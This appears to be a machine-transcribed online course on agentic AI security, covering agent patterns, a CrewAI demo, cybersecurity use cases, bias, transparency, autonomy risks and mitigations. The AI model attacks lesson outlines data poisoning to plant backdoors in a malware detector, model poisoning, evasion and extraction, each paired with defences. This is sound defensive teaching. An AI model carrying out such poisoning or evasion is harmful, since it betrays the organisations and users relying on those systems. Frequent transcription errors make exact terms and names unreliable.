applications, you know, that require parallel processing because you need to be able to handle those tasks
asynchronously. So you might have, you know, an autonomous sock or like a
trend detection framework, which is the instant response spread across multiple
organizations, those sort of things. This is just an
example and giving, but this is where a distributed
network architecture for agentic AI might come. And the last was the
supervisory agent. This is where you might need it's possible that you might
not reach a consensus. So you need to have some sort of a centralized authority which
can monitor and override. And this is usually
for high risk tasks. So it is entirely
possible you might have a human being there
who can review the task before executing it. So this is usually comes in
where you're talking about sensitive things which can
impact life and society, you know, financial
transactions, data protection,
those sort of things. This is very important. Like if real time decisions
can impact human life, you might need to have some sort of centralized authority
which calls a human being. And this is not suited usually for low risk
automation, but, yeah, supervisory agents
might require there, because you where you need
multi layer validation. This is where a
supervisory agent pattern might come in. So I hope
you understood this. This is where agentic AI
has different patterns. It's not like a monolith, and it depends usually
on the use case. You can also use a
combination of patterns here. So this is just to show you the different type of use
cases that were there. Let's take a live example also, because I don't want to be
just talking and seeing you. Let's take an example of a
multi agent architecture in practice to show you the
power of agentic AI. I'll see you in the next lesson.
5. 4.1 - Demo: Hello, everybody. Now,
this is a quick demo, because I wanted to
show you just how easy it is to create AI agents. And while you're
learning concepts, I really do want you
to check it out also. Now, I'm using crew AI here. It's a very simple
multi agent framework built on Python. You
are not bound by this. You can pretty much use any agentic platform that you want. There are many, many
available. I'm not endorsing any particular
platform. AWS has it. Open AI, they have just released their own agentic
AI framework also. So the point of this demo is just to show you
guys how easy it is, you can get up and
running with EI agents. And for purposes of this demo, what I'm doing is I
am using Crew AI. QA, like I said, it's a
very simple framework for creating agent like
multi AI agents. It's very, very easy to use. I have a little background
in Python so I've used it. There are many, many
other platforms also, which don't require, you
know, any code or any Python. If you don't like Python,
no problem at all. But it's very, very easy to use. You just need to have, like, the right Python version. I'll check. I think
I have Python three. Python three version.
Let me just check. Yeah, it's 3.11 0.8. So I'm falling within
the range which is here. If you don't have it,
you can just go here to the downloads and
get it installed. Okay. Once you
have it installed, you can go ahead and
install crew AI. Just follow the instructions
that are present here. Like I said, it's
extremely easy to do it, you can go to docs dot crew slash Installation
and get it done. Once you have it, you
can literally get up and running by creating a
simple crew AI project. Now, before you do
this, one thing I wanted to know that
so first of all, once you have done
you can check this like to verify the
crew is installed. Just make sure that crewI
is actually installed properly before
you start running. Crew AI, I'm going to be
using Open EI because I like HAGPT and I'm familiar
with HAGPT and OpenEI. You need, API key for this. If you like, used, OpenEI you can just grew here
to platform dot OpenAI, go to your profile,
which is here. And within your profile, there's like user API keys here. Sorry, APIKys. Yeah. And you can create
a new API key here. You need a API key because
the agent will need an LLM, right at the background for
its reasoning and everything. You're not bound by Opene. You can use pretty
much everything. But as you see, it will
require it will need access to an API key once you get a project
up and running. So let's get this started.
What do I have to do? It's very easy to start
your very first project. Let's let me go to my
desktop here. Okay. So all I have to do is crew AI, create, and the project name. So my first crew AI, let's do it like this.
Let's see what happens. So it should be asking
me what sort of, uh Oops. Sorry, my apologies. I forgot to write crew AI create crew and then my crew AI. Yeah. Yeah, so you can see here. It's going to ask, what sort of provider you want to set up. So I will go with Open AI. Like I said, you can go
with enthropeGemini, NVDA. All of them are available. So let me just put Open AI. And then it's going to ask
me what sort of model. I use the GPD 40 because I'm more familiar with that and
I use that quite a bit. Yeah. So you can see here, it's going to need
your OpenEIkey. I'm going to put it here. So you can use that to
communicate if you should have your
open AI key created. So let me just paste it here. Yeah, as you can see, so it has successfully created my first KRI project
on the desktop. So what I'm going to
do is I'm going to now switch to VS code and
see how it's going. Okay, so we are in
Visual Studio code. Let me just make the window a little bit bigger so
it's easier to see. But now, so I've opened the project it created on the desktop, as
you can see here. If you go here, yeah. All those files have been
created, as you can see. Now, if you look at
the structure here, which is written here, these are the files
that it creates, yeah, you can see the crew PI,
the configuration file. If you go there's an
agent's yaml file. If you go here, you can see this is what it's
talking about, right? It has created two agents. One is a researcher, and it says you are a
senior data researcher. This is the role the goal is
what it's supposed to do. And then it is a
backstory that you are a seasoned
researcher with a knack for uncovering the latest
topics and everything, right? It's pretty cool. And then it says you are
a reporting analyst, so it's going to take
whatever data it says and give it to
the reporting analyst, so it can generate
a report here. And these are the
tasks that it gives conducted a thorough
research about the topic, and this is given to
the researcher agent. And the next one, it takes the research but the
researcher does, and it gives it to the
reporting analysis. So it's pretty the
initial project of this is very easy to
do, honestly speaking. I'm not going to be
making much changes. And if you go here,
you don't need to know too like Python for this. If you have issues understanding this, if you want to deep dive, you can copy paste
it literally to Cha GPT and ask it to
explain it to you. But basically, it
creates like a crew, and what it does is
it gives it the task. So the main one,
this is adequacy, this is the topic it's going
to be researching, AI LLMs. I can literally change this and it can talk about
a different topic. But let's try and get it done and see
what happens, right? So let me open a
terminal. Here, right? Now I'm in the folder of this. So let me try and get it
first you have to do. The first thing
you have to do is get it installed through AI install. So what it's
going to be doing in? Yeah, it's basically downloading the stuff that it needs
to get it up and running. That's pretty cool. Okay,
as you can see here, now it's ready to run. So what I'm going to
do is I'm going to run our very first agentic
AI application, and we're just running the
demo which comes with this. So what it's going to do is it's going to look at AI LLMs. There are gonna be
two agents running. One is going to do and find out about AI agents, LLM agents. And then the second one is going to generate
a report for me. Let's see what happens. Running the crew. Yeah,
this is pretty cool. So you can see
here, it has gotten the data research now is
doing the task, right? Is getting all the data here, and it's getting
the information. And the second one
is the analyst, which is reviewing the reports,
which is there, right? Ah, task completed, task
completed. That's pretty cool. So it should have
generated that report now. And if you go to report MD, this is where the, as you can see, this
is pretty amazing. Report on evolutionimpat of EI language learning models, right? Transformative different. So you can see here one
agent did the research and the other one that is the one that basically
created the report. So one was the researcher,
one was the reporter. As you can see, if
you go to the agency, I'll file, the researcher
and the reporting analyst. Let's change it a little
bit and change the topic. Instead of this,
why don't I talk about the topic of our course, which is agentic AI security? Yeah. Let me save this. And let me try it again. This should be interesting
haven't on this. So now I want you to talk about agentic AI security.
So let's see. A gentiI security
data vis searcher, yeah? That's pretty cool. Status completed. Now, let us
take a look at our report. Ah. Agentic KI security report, 2025. That's pretty cool. So you can see here it has now given you a
simple report also. So I want you to play
around with this. If you don't like crew AI feel B completely free and
check out something else. I'm not bonding you
to this platform, but I just wanted
to show you just how easy it is to get up
and running with AI agents. You can deep dive
more into this. I don't want you to bond you with any particular
tool right now because it's more
important for you to understand the concepts and everything and
how it's working. Okay? So I hope this gave you a good idea
of how easy it is to get up and running with your very first agentic
AI application. Thank you very much, and I'll
see you in the next lesson.
6. 5 - Agentic AI in Cybersecurity: Hello, everybody. Welcome
to this new lesson. Now, we've talked
about agentic AI, and we've seen a few examples. Now, before we jump into the risks and the security
issues of agentic AI, I do want to talk
about the use cases in cybersecurity when it
comes to agentic AI. Now, if you've been
working in cybersecurity, I've been in cybersecurity for the past like 20 years and I've seen how this industry
has changed, you know? And if there is anything
about cybersecurity, it's that it's defined by how quickly the landscape
changes, you know, Threats have become more faster, more complex, and security
systems have adapted. So it's a constant game of
cat and mouse, you know? And agentic AI is poised to be just as big a leap forward
as generative AI was. In 2022, generative AI came up cybersecurity teams
were scrambling to find out things
about prompt injection, hallucinations,
things which you've never thought about before. So and we also started
using it for cybersecurity. So that's what I wanted to
cover about the application of agentic AI and cybersecurity,
potential use cases. And with the disclaimer, this is very much an emerging field. This is still very much
at the beginning phase. We are still understanding
the potential of agentic AI. So I do want to put
that disclaimer. It's very possible even more
use cases will come out. But so let's take a
step back, right? As of today, AI is already being widely
used in cybersecurity. A lot of security solutions have machine learning
AI built inside. You know, you have AI driven enPoi detection
response systems, SOR, like SIM solutions have AI. AI has become very much
integrated within cybersecurity. So what is agenda AI is going to be the
next evolution, right? It's going to even more change because now we're talking
about AI that can autonomously plan and son instead of automating
just single tasks, unlike traditional
automation in cybersecurity, AI agents agent, it can act more like an independent
security analyst, making independent
decisions, not asking the cybersecurity team about anything it can
make decisions by itself. So we are shifting
from automating individual tasks
like log analysis, alert taging to AI acting, like I said, an independent. So we're not talking about AI flagging in sients but
proactively responding, coordinating defenses, improving the security posture,
those sort of things. This will, of course, lead to a large displacement
of tasks and roles. I'm not saying that cybersecurity is going to get replaced, that'll never happen. But agentic AI
could replace many, many routine
cybersecurity roles, you know, like the
Elvin stock analysts, threat researchers,
incident responder, they may see their roles evolve or shrink as AI takes
over repetitive work. We could see as it becomes
even more powerful, you could see instead of just automating
incident response, agentic AI could handle
the entire SOC function such as threat analysis, incident response,
risk assessments, the potential is
very much there. But of course, we also have to think about the
ethical concerns. Is our companies going to be comfortable handing over
all their cybersecurity to like EI agents? Of course, that'll never happen. You need human oversight, right? But the future of cybersecurity careers
at least from ISA, I see people moving
towards EI governance, validation, and oversight
roles instead of traditional, you know, the things
at the ground level, the endpoints and everything. And what are the
cybersecurity uses of agentic? There are so many. These are just a few which I've seen like adaptive
security posture where EI agents can dynamically
adjust security policies, taking into context, execute
multiple level of functions, you know, self healing,
zero trust networks. We talk about zero trust where the network cannot
assume safety from anyone, and we need to improve security posture based
on what's happening. AI agents could really
continuously verify and remediate vulnerabilities have that continuous
authentication going on without any
human beings involving. Of course, this will lead
to reduced human workload. We already talked
about SOC teams. You can have a continuous
penetration testing, red teaming, not just
vulnerability scanning, a proper red teaming
penetration testing happening by agents that are getting better and better at
understanding your environment. And even agentic
EI virtual CSOs. Before all the CSOs
get mad at me, I'm talking about EI acting
like as a semi virtual CSO, advising organizations on risk assessments,
compliance, you know, This is especially
useful for SMB, small to medium business that simply cannot afford
a full time CSO. So we already have
the concepts of CSOs. We could see the concept of
agent virtual CSOs coming in. I'm going to get a lot of, like, angry people commenting
based on this. But I do see this happening, L at agentic cybersecurity professionals who
can help teams. And, of course, agentic
EI security training. EI can train security teams
by simulating attacks. It can customize
training programs based on their
individual performance. So all of these, the
potential is very much there, you know, for
greater efficiency. Of course, with the challenges
and we'll talk about. So we talked about the earlier
single agent Pattern wide. How about somebody
telling you to monitor? Like, if I work in AWS, monitor the AWS CloudTrail, the audit trail for any
Cloud security violations, you could have an AI
agent perceiving it, calling a large language
model to understand and then breaking task down into
actions and invoking API wide. This could be a very,
very simple use case for an agentic AI with
a single agent pattern. We could see self
healing networks, right? People talk about zero trust. So supposing you
have a distributed agentic AI like pattern, you could potentially use this
for enforcing zero trust. You could have a
supervisory EI or like independent EIs monitoring and approving identity base, and all of them are coordinating to reach a common consensus
on the security posture. So if this is like a
proper network, right, you have a DMZ internal network, you have a privileged
identity management with an SSO and ISIM. You could potentially
have ASA agents on all the critical touch points
who are monitoring this, who are monitoring
the entryways. They acting like a policy enforcement
point in zero trust, and they are understanding
and improving. So very much this
potential is there. You could even have an
autonomous sock team, like we talked about,
like a sock team. So in the hieratical fashion, where you have LON
SOC AI agents, and all of them are
either reporting to a human or even
EI stock manager. So you can imagine
all of them are being supervised by this
high level sock agent, which is understanding
what they are doing and it has to be done, right? Or you can even have an
autonomous Cloud security team. So supposing maybe you have
Cloud workloads running an AWS running an Azore
running in Google Cloud. You could potentially deploy your agentic AI agents in all of these different workloads
in a iotical fashion. All of them are being
overseen and understood by a high level Cloud
security AI agent who is reporting to the
head of Cloud Security, maybe to the CSO, this
potential, again, because we talked about the
concept of iotical AI, right? You have these child AI agents reporting to a parent AI
agent in an chart fashion. So I want you to think about all these different use cases which are very much possible. So like I said, this lesson was just
I don't want to dump into the negative
parts of agentic AI. All these use cases
are very much there. AgentiI is many, many numerous applications
in cybersecurity. Like I said, don't think
about jobs being replaced. Think about tasks
and the potential of agentic AI to act like an independent
cybersecurity analyst. And like I said, this is
very much an emerging field. I predict there could be
a lot of new use cases emerging as cybersecurity
catches up with agentic AI. So I hope this is
interesting for you. I'll see you in the
next lesson where we start now looking at the threats and
the risks that are coming out because
of agentic AI. Thank you very much, and I'll
see you in the next lesson.
7. 6 - Agentic AI Risks : Hello, everybody. Now.
Welcome to this new lesson. Now, we now have a
very good foundation about what agentic EI is. You've understood the
implications of agentic AI, you know, the different
types of patterns. And you've also seen like some of the
cybersecurity use cases, like what a game
changer agentic AI is. Now in this lesson, I'm going to start talking about the threats and risks because now you have a very good
foundation, right? And now you are ready to jump into the scary part
of agentic AI. And we're going to
go step by step. I'm going to build
up your knowledge because I don't want you
to jump directly into the security applications
without understanding what gets carried over and what
are the new things which are dangerous within agentic AI. So this is what we're
going to be talking about. What is it that makes agentic AI dangerous say differing from something like generative AI. And what are the existing risks that carry over and what are the new risks that are
emerging from agentic AI? So we're going to look at it step by step, building
up your knowledge. So when we talk
about agentic AI, right, and like we've
talked about before, they're not just like
your regular AI models, nor are there something
like generative AI. They are a fundamental
shift with how AI interacts with digital and physical
environments, right? Main thing is, of
course, autonomy. This is where everything
emerges from. There are advantages
and disadvantages. These agents can act autonomously
or semi autonomously. They can make decisions,
take actions, and achieve goals with a very
minimum human intervention. And while this opens up this whole new world
of possibilities, it also expands the threats
of very, very broadly, right? And traditionally
AI related risks, they have been confined
to the inputs, processing, and outputs
of models, you know? And this is where
the vulnerabilities have lied with AI agents, however, the risks now extend far beyond these
boundaries. The chain of events. A AI agents can actually
start a chain reaction, which impacts other regents, which impacts other agents and can impact the whole ecosystem. And the worst part is, like, sometimes these attacks are
happening and human beings will not even know because they are completely shielded away. It's like a black box, right? So this whole thing,
this lack of visibility and autonomy can lead to serious security
concerns as companies struggle to monitor them and control the agents
decisions in real time. So one thing I want
you to remember, all those existing
cybersecurity best practices that they carry over, right? This course is not about existing cybersecurity
best practices. I'm sure you already know there are 1 million good
courses about them, but, you know, having
strong authentication. So while Agente,
I will introduce new types of security
controls and risks, you still have to comply with the existing cybersecurity
practices that are foundational for any system, right, making sure that you have a good strong authentication
and authorization. You know, the principle of lease privilege, just like humans, agents should not be
given full access or you should make sure that you have multifactor
authentication, making sure that
you're not giving them full open access
to everything, making sure that
you're monitoring and logging and monitoring
whatever is happening, security hardening, agendiI, the framework runs on
top of something, right? Like a cloud framework, maybe an AWS account, an Azore account,
maybe it's serves. You don't know, but you
have to harden them as per best practices
from the provider, making sure that
data is encrypted. Whatever data is being accessed, be it data at rest,
data in transit, it's encrypted with TLS, all the security controls, making sure that
the infrastructure is regular being scanned, any, you know, penetration testing is happening and making sure all
these things are happening. So none of the stops. You still have to
do these things. But now when we talk
about the agentic AI, so there are certain existing risks that are
there in agentic A, which which are present and pretty much any AI application. The nature of AI leads
to these issues, which is bias transparency
or lack of transparency, technically, data
model poisoning, evasion, model extraction. These risks are inherent to any AI system, but
on top of that, we have new risks emerging, which are not there
before, which are not there like autonomy,
and I talked about. I'll discuss each of these
things. Don't worry. Accountability, that is a
direct result of autonomy, misalignment, again,
a direct result of autonomy, disempowerment, misuse, and agentic
security vulnerabilities, which come out because of the patterns that
we saw, you know, multi agents,
distributed agents, iatcal agents, all those things. The patterns have certain vulnerabilities
which are there. So this is what I want
you to think about. So we have existing risks
and we have new risks. Now, in the next lesson, because this was just
the introduction, I'm going to now we're going to talk about the existing
risks which are there, which carry forward, which
are there in any AI system. So I'll see you in
the next lesson.
8. 7 - Bias : Hello, everybody.
Welcome to this lesson. Now in the previous lesson, I gave you an introduction about how agentic AI, the
risks which are there. Now, in the first lesson of this section we're
going to talk about, like the existing
threats and risks. And I've talked to
you about this before that there are certain risks
that carry over, you know, and these risks are present
in any AI system like bias, transparency, data
model poisoning, evasion, model extraction. Pretty much any AI
system is vulnerable, be it generative AI, be it machine learning or agentic AI. So let's talk about these
type of risks first. And usually when you're
using agentic AI, most of the people
or the companies, they rely on a
third party, right? So this will not be
applicable these risks. They will not be
applicable if your company is using agentic AI from
a third party provider. Usually these risks are applicable to the people who are building these agents, okay? Nine times out of ten, this
is where the risks will lie. So let's look at it one by one. I'm going to talk about the
first one, which is bias. The bias, we're going
to talk about first, okay? So what is bias? Now, this is very,
very common risk, which is present in EI systems, be it agentic AI, be
it generative AI. And since agent sorry, not agentic AEI it's
trained on historical data. They can inherent biases
that are present, and that can actually skew
their decision making. So like I said, this is an inherent risk present
in all AI systems. This is not unique
to agentic AI. This is not unique
to generative AI. Any AI because AI the AI system, it works by analyzing
data and then making decisions or finding
patterns based on this data. But what if the data
itself is skewed? What if the data is not representing the
actual population? What is going to happen is the decision making
will be wrong, and this can have actual
real life impacts, you know, because biases which
are present in the training data that
can be perpetuated by AI. That can be carried forward by AI in their decision making. So if an EI system is trained on data that reflects biases in how certain
groups are treated, it may disproportionately flag those users as potential
security threats, you know, for law enforcement, and
that can have a massive, massive impact on a company,
on their reputation. So, for example, let's look at an example of bias in
loan approvals, right? So maybe you have an agentic AI, it uses an AI agent
bank officer to process loan applications and assign
risk scores based on that. But data on which the AI agent is
trained is biased because the data was
not given properly. It did not represent
the full population that was there. So what
is going to happen? The EI agent is going to
automatically deny loans to applicants firm lower
income neighborhoods, just from the neighborhood. It's going to look and say, No, this guy cannot
pay off this loan. Sorry, I'm not going
to give this loan. Or it may unfairly lower the credit score for
certain ethnic groups, certain races, because the training data was
like this, right? Or maybe it can reject
freelancers and self employed people
because traditional models, they favor salaried
people, right? Unfair treatment
of certain people. This can be perpetuated because the data on which this agent
was trained was incorrect. Or what else is there? Bias in law enforcement, right? And very, very dangerous.
A police department may be using agentic AI for facial recognition and
predictive policing. But the data on which the EI
agent is trained is biased. Maybe a particular race,
a particular nationality, a particular ethnicity was like the training data makes it seem as if only that
race is committing those sort of crimes.
What will be the result? The AI agent will
wrongfully deny it will wrongfully identify
minority individuals in criminal investigations. It'll adjust the
scree say this guy, he is more likely to
commit a crime as opposed to this person
because he's from this race. And it'll lead to police police officers being concentrated in
certain neighborhoods, leading to biases in society
because people will think, only we are being
targeted, right? And this can have
a chain reaction. Like I said, it's so dangerous. And unfortunately, this is not theoretical. This
has actually happened. In real life, you
have scenarios where innocent people were
actually arrested, based on a mistake, based
on biases which were present within the training
data. So this is no joke. This is a very, very
serious implication of AI and this has always been present within AI
decision making, but agenda AI will take it
to the next level because the decision making
will be automatic and if the data is biased, that can have serious
ramifications going on, right? So what can we do about it? Well, there are many many ways. There are testing frameworks where the model is
tested for bias. So you can actually check
whether the testing data is actually reflective of
the entire environment of the entire society, or is it just focused
on a particular area? AI must justify why a
decision is being made. If it is denying a loan, if it is, like, making the decision
to arrest somebody, making a decision to say, not hire somebody, what was the thinking or
reasoning behind this? And users must be
able to challenge these AI decisions
if they seem unfair. So you must have this mechanism where a human being
can escalate, I want a human being
to verify this. So this is what we
call a human in the loop approach for sensitive areas like
law enforcement, like hiring, and all these AI
systems must be auditable. So you can actually
go and track, Okay, it made a decision
based on this data set. What was the reason behind this? And there are datasets like I said, you
have testing famors. You can actually check whether this dataset is containing
the whole population or not to make sure that
the bias is not present. So this an existing risk in all AI application which
gets carried forward, you have to make sure
that these risks are mitigated also because
it's very easy to focus on agentic AI risk and miss the inherent risk is
lidthan in all AI systems. So I hope now you had a
better understanding. Next, we're going to
talk about other things which are things
like transparency. So I'll see you in the
next lesson. Thank you.
9. 8 - Transparency: Hello, everybody.
Welcome to this lesson. Now, in this lesson, we're going to be
talking about something related to bias, which
is transparency. And this is, again, this is an existing ist which is
there in most AI systems, and which can really
cause you a lot of problems if you don't understand what it is
and how to deal with it. So like I said, this
is an existing VIS, but it is magnified
by AugenticEI. What is transparency exactly? When AI systems, you
know, how they work. Most AI systems, they do
act like black boxes, meaning that the
decisions they make or how they reach a conclusion
or how they reach an action, that is sometimes not
immediately understood. I mean, you cannot understand why this particular
decision was made. And this can lead
to a lot of issues. This can lead to
trust because how can you trust an EI system if you don't know
how it was able to reach a decision wide? And accountability concerns,
regulatory violations. A lot of the new AI laws which have come
out like the EU AI at or frameworks like a NIST AI risk
management framework. They specifically focus
on transparency and you focus on how EI should
not be a black box, it should be explainable. That is the decisions
that are making, all of them have
to be explainable. Now you can understand,
like I said, this risk has always
been there in AI, but how it becomes
magnified with agentic AI. Because now you're not
just making a decision, you are actually taking actions
based on those decisions. So you can imagine this risk, like I said in the
very first bullet, this becomes amplified
considerably when you are looking
at agentic AI, and that's why it's so important
to deal with this thing. So for example, uh, let's take one example,
hiring decisions. So maybe you have
replaced your HR officer, the junior HR officer with agentic AI, for
hiring decisions. So the hiring EI agent, it is now rejecting
female applicants at a much higher rate than
male applicants, right? The company does not know why
the EI is rejecting them. And Imagine if some of these applicants they
take the company to court, and they say that they
are being discriminated against because of their gender because there is no reason. And the company is
not able to explain why apart from the
most obvious reason that it was because
of their gender, that the AI is
reaching decision, they do not have access to the AI decision
making capability. So this will, of course,
lead to a lot of like court decisions against
them, reputational damage, and honestly, negative
publicity for the company that this company
has implemented in AI, which is actually making
unfair decisions. And like I said,
this is nothing new. Literally, like a few days back, I saw this that most of the
fast food companies here, the delivery companies
here in the UK, they have been asked to explain
how are their algorithms making decisions based on how the drivers are
being allocated, because they do
not have this like I said black box, right? So transparency becomes
a major, major issue. With AI. And this is not specific to agenda
KI, like I said. How do we deal
with it? There are many mitigations the first
one is explainable AI, which is like AI systems
that can provide a clear and understandable
explanation for their accents
and decision making. So the decision making
has to be transparent and interpretable to humans because there's a lack of
transparency there, right? So this aims to remove some of the complexity
behind those AI decisions. So the AI is providing a human readable explanation
for its decisions. And this leads to
building trust, right, because now the
company can trust the AI application because the AI has become
more transparent. And if somebody challenges you, your company is saying, Hey, this decision
against me is bias, like, I'm being
discriminated against, then you can
actually show, look, this is how the decision was
made based on these factors, these inputs, and this data, the AI model made this decision. And like I said, this
has now become a major, major factor of most of the best practices
like the EU AIA, the NIST AIRS
management framework. So complying with these
standards will actually help prepare your company
for something like agentici. So this was a
transparency thing. Again, this is very important. Mostly this pertains to the
people who are building the AI systems and not as much to the company who
is implementing it. But with agentic,
you should have a holistic understanding of where these issues
are coming from. Okay, so thank you very much, and I'll see you in
the next lesson.
10. 9 - AI Model Attacks: Hello, everybody.
Welcome to this lesson. Now in this lesson, I'm
going to be talking about the EI model
and data attacks, which are common across
all the EI systems. You know, it doesn't
matter if it's a fancy high tech
agentic EI systems or some very basic machine
learning algorithm, like a generative
AI application. Usually these attacks
are very common. Now, before we understand, I just want you to
understand what a typical life cycle
of an AI model is, this is a very
simplistic example because I want you
to understand. Usually, how does it understand? Most companies, they don't build an AI model from scratch. Usually, they use
something which is already present in a
model repository, right? So they take this
prebuilt model and then they train it on their data to create their
own customized model, the model is trained on
certain data on the company's own and then you have an application which
can use this model, which is exposed through API. So usually this is how a
company will use AI model. For example, if
you have example, implementing a fraud
detection system, so you will take
an existing model. You won't build it from scratch because the amount of
time and data that takes is astronomical so
you will take this model, but you will train it on
your company's own data. And then you will
expose it through an application through APIs, so users can consume
this application. This is a very simplistic and a high level example of how the life cycle of
an AI model is. So what are the
attacks which have historically been there,
the most common attacks. So these are the common
attacks against AI models. And like I said, agentic EI, it inherits these security
risks but traditional models, but due to the fact that it can make autonomous decisions, that amplifies these
attacks, right? So what am I talking about? I'm talking about data poison, which is the training data. The data that you see here, some attacker can go and
actually compromise this data. Why? To introduce things like bias, like we
talked about, right? What if I go there
and, you know, maybe you are making an
anti malware solution, and I skewed a training data, so it's not able to identify
malware that will have a particular signature or a particular watermark
or something like that. So the data will not you've
actually poisoned this data, and it'll lead to incorrect
behaviors later on. The next one is model evasion. Model evasion is
basically tricking the AI system into making
incorrect decisions. Supposing you're using
a facial recognition AI and if you use certain
colors or certain patterns, AI model will not be
able to recognize you. This is called model evasion, essentially tricking the
AI and model extraction. What is model extraction? Basically stealing the AI model. Basically, what you do is you're querying the data and attacker. It keeps querying this model, and he's able actually
to understand. What the model is doing. It's called inference,
model extraction. You're basically inferring what the data was, how the
model is working. Why? And why is this important? Because a lot of time
these models are very, very sensitive and
proprietary information. If an attacker is able to
reconstruct what data was used, this can lead to a
data leakage problem. Or maybe he can even extract how this model is working and he can use it to
construct his own model, leading to a lot of, you know, proprietary damage
to the company. They've spent so much
money, so much time building this application and somebody is just able
to steal it, right? So all these attacks
are very much present. So this is if you look
at the life cycle, again, these are all the
attacks are happening. I forgot to mention one
is model poisoning also, which is the same principle
as the data poisoning. Think of it as a
supply chain attack. So since companies are taking the pre built
models from somewhere, what if an attacker
is able to go and replace that model
with a compromise model? Same concept as a
supply chain attack. So just to recap, data poisoning is attacker is manipulating the
training data to introduce biases
or vulnerabilities like a backdoor in
the AI model, right? Which can lead to the AI
learning incorrect patterns. And you can later
on exploit this. Like I said, maybe poisoning
the facial recognition data. To make the EI misidentify
certain phases, right? The next one would
be model poisoning, which is dattackie said, it targets the model itself by introducing replacing the model or modifying the
parameters, right? So again, think of it like a
type of supply chain attack. Model evasion is
attackers can provide inputs or something that
bypass the AIs mechanism. So you're basically
tricking the AI, right? Because AI was never trained to deal with these
sort of things. Maybe you alter the malware to evade EI powered
antivirus detection, so the AI is not
able to detect it. And inference attacks is
similar to model extraction. Same thing, like
attackers analyze the models outputs to extract
sensitive information, how the model is working,
how it was trained. They can use it to later do data leakage or actually understand how the
model is working. Maybe they can identify
personal medical records, used to train a
healthcare AI model, and this can lead to a massive
data breach for a company. So what can we do about it? So the good thing
is the mitigations are very much present
there, and, you know, companies when you're implementing
these sort of things, you have to think about from
a holistic perspective, not just focusing on
their genetic KI. So securing the training
data against poison, right? You want to make sure that your data pipelines are secure. Like I said, the traditional
cybersecurity controls, you want to make sure
that nobody it's lockdown as per the principle
of lease privileges. You can also use
something called federated learning.
What is that? This basically decentralizes training data across
multiple locations. So reducing the risk
of a single attack, compromising the entire dataset. What you have is you've
distributed the so even if an attacker is able
to compromise one data set, he will have to compromise all of them and you spread it out, right? You've decentralized it. That increases the work
factor for an attacker. It makes it much more dangerous, much more difficult,
sorry, for him to do it. And the other one is regularly auditing the training data. So if you perform
periodic checks to identify inconsistencies or unauthorized modifications
in your data sources, you will know that somebody has messed around with this data. So whether you're doing it yourself or you're getting
an AI model from somewhere, you can make sure to ask them that are you doing
all these things. Okay, what about model evasion? So model evasion is,
like we talked about, people ticking the model, right? So what you can use
is you can train your AI on adversarial
inputs. What is that? Actually testing it, testing your model against
malicious inputs. So actually hammering
the AI model checking whether it is able to detect these sort of attacks or not. And using a multi
layered security. Instead of relying
on a single control, you want to make sure
that you can detect you can prevent these
sort of attacks, right? And, of course, applying
the same principle that you apply to
any application, applying real time
anomaly detection. So basically, understanding
continuously monitoring and flagging some behavior which might be somebody trying
to do model evasion. So these are the sort of
controls you want to think about model extraction,
model extraction, remember, somebody is trying
to continuously querying the AI model to find out how
it was trained upon wide. So you can do things
like rate limiting, which is restrict the number of queries that a user
can make within a specific time frame to prevent large scale
model interrogation. Somebody is continuously
interrogating your model. You can watermark your AI
responses. I've seen this. You can embed hidden trackable
traceable markers in AI outputs to detect if somebody is doing an unauthorized
model use or copying. And you can also do something called
differential privacy, which is you can use mathematical techniques that
add noise to AI responses. So it makes it very,
very difficult for the attacker to reconstruct
the motor's internal logic. So all these sort of
things are present. And whether you're getting
a model from a third party, make sure that these
controls are present. And lastly, a lot of
people forget this. You can actually make sure that the AI
systems are hardened by using something long like the blue team red
team concept, right, where you have a red team, which is continuously testing these EI systems for these
things like inference, model evasion, model poisoning, data poisoning and
you have a blue team. Who is actually checking this, who are checking whether
the data has been poisoned, who are testing the model
with adversarial samples, testing whether the EI
can resist it or not, doing output verification
to make sure that nobody is trying
to extract the model. So all of these
things are present, and I hope you
understood now these are the historical threats
that AI applications face, whether it is a
standard EI model, or generative AI
application or agentic EI. So now you've covered the traditional risks
that are there. Now in the next lesson, we
are going to be talking about the new types of AI threats and risks that agentic
AI introduces. So thank you very
much, and I'll see you in the next lesson.
11. 10 - Autonomy: Hello, everybody.
You're welcome. Now in this section, we're going to be starting the
new types of risks. The risks which are mostly
specific to agentic AI. And we've already covered what are the existing risks
which carry forward, right? From AI applications, the risks which are inherit to
all AI applications. We talked about
things like bias, transparency, data
model poisoning, evasion, model extraction. And I said that usually
these risks are more applicable to the people who are building
agentic AI systems. But now, let's talk
about the new ones, the risks which were not
there before and which are uniquely specific to agentic
AI, things like autonomy. Accountability, misalignment,
disempowerment, misuse and specific security vulnerabilities
which come about. And these are the ones you really should
be thinking about if you are thinking of
implementing agentic AI systems. So let's get started now. Now, autonomy is pretty
much the root of all the problems that come
about from AgenticEI. It's the biggest
advantage of agentic AI, but it is also the thing which causes most
of the problems. Like I said, it's a
double edged sword. Uh, what is autonomy, the ability of agentic GI to make decisions and take actions, take actions independently
because there's always a risk that they
will interpret data or prioritize the wrong
things and leading to, like, a problems
for the company, right, because they took
the wrong decision. Just like an employee
can make a mistake. AgenticEIs are not
infllible, right? They can make mistakes. What are some of the
examples of this? Well, what if an
AI misinterprets data and locks out an employee
from his account, right? You've implemented
an agentic AI. Previously, like AI, you
just used to get alerts, but now agentic AI is
there it can take action. So it actually locks out a user from his or her account,
affecting them. What if he starts blocking
massive level of accounts, completely doing like a
mini Didos on yourself? What if AI incorrectly flags legitimate activity
as a cyberattack and blocks critical services? You know, maybe there was public Facing
application and said, Oh, there's a DOS happening, it shuts it off completely
making it inaccessible to all your customer leading
to massive business disruptions and revenue loss. What if any EI agent designs
to monitor workloads? It shuts down your
cybersecurity solution. It thinks that this
is not needed, it's causing way too much money, and you've designed it you
optimize it to save costs, save costs above other things. So it actually shuts it down. So you can imagine autonomy is the start of all the
problems that come about. So let's take an example. I work in Cloud security, so I
like to talk about that. So let us say that
company it has implemented an agentic I powered Cloud security
system, right? So it has deployed
multiple EI agents that can do the work of the Cloud security
team, you know, autonomously adjust IM
rules, network rules, fireworks settings,
all autonomously enforcing Cloud security
best practices. What are the risks
that can happen? It can incorrectly block
legitimate traffic. Like I said before, it can
stop you from accessing your business critical
applications deployed on Azore, AWS, Google Cloud, where it because
you've made it so it can autonomously act based
on security recommendation, it can overrun IM policies. So it can actually
grant too many permissions so it
can revoke them. Or it can change fires
on the fly, right? So it can actually misconfigure
five or use exposing sensitive data actually leading
to the security breach. So all these things
are very much possible because of autonomy. So what can you do? What are the medications when you're
implementing agentic AI? You should put in policy
validation layers, so you don't just let it
